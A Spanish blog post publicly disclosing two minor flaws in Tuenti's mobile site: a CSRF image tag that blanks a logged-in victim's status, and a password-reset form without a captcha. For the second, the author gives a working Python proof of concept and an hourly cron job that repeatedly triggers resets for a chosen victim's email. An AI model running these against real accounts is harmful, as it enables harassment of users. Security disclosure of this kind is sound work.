Pequeñas “vulnerabilidades” en tuenti móvil

Escribo este post para reportar públicamente un par de vulnerabilidades (probablemente haya más, no me he de tenido a examinar muy a fondo) de la versión móvil de tuenti. La primera de las vulnerabilidades es de un peligro mínimo y es hasta difícil de explotar, pero como no tengo nada que escribir, aquí la pongo. La segunda si que puede resultar un poco molesta si se explota de forma adecuada.

La primera de las vulnerabilidades consiste en que podemos hacer que el estado de la víctima se cambie por un estado vacío. Lo sé, es una tontería. Para proceder a “explotarla”  tenemos que hacer que la víctima abra una página (pasándole un enlace y que este lo clique) que contenga este código :

</pre>
<img src="http://m.tuenti.com/?m=profile&func=process_set_status" alt="" />
<pre>

teniendo este la sesión de tuenti móvil abierta.

Después de esto, otro “problema” de seguridad es que en la versión móvil, el formulario para mandar una nueva contraseña al correo no tiene un capchta, por lo que se puede automatizar perfectamente el proceso obligando a la víctima a que se le cambie la contraseña. Este proceso no puede ser continuo ya que tuenti tiene implementada una “medida de seguridad” que hace que solo se pueda hacer esto una vez cada hora. De cualquier manera esto es algo que puede ser bastante molesto.

Para demostrar esto último, he hecho un PoC en python que realiza esta tarea:

#!/usr/bin/python
#PoC para vulnerabilidad de tuenti
# @BraulioVM
import urllib, urllib2, sys

if len(sys.argv) != 2:
  print "Usage: python ",sys.argv[0],"  "
  exit()

urlPoc = "http://m.tuenti.com/?m=login&func=process_forgot_password"
correoVictima = sys.argv[1]
postData = urllib.urlencode({ 'tuentiemail' : correoVictima })
code = urllib2.urlopen(urlPoc, postData).read()

if "Lo sentimos" in code:
  print "Posiblemente hubo un error, intentelo mas tarde"
else :
  print "Si el correo era correcto, posiblemente se haya completado la tarea con exito"

Si queremos que se ejecute cada hora, en linux basta con que añadamos el siguiente script a la carpeta /etc/cron.hourly/

#!/bin/sh
python /ruta/hacia/el/poc.py emailquesea@email.com

Para comprobar si el servicio cron está corriendo hacemos:

/etc/init.d/crond status

Y si no está en marcha lo iniciamos con

/etc/init.d/crond start

Bueno, eso ha sido todo. Me imagino que gracias a los reportes, los ingenieros de tuenti arreglarán la segunda vulnerabilidad y quizás también la primera.

Saludos.

Anuncios

Acerca de Braulio

"CEO" de Alfffa Solutions Ver todas las entradas de Braulio

One response to “Pequeñas “vulnerabilidades” en tuenti móvil

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: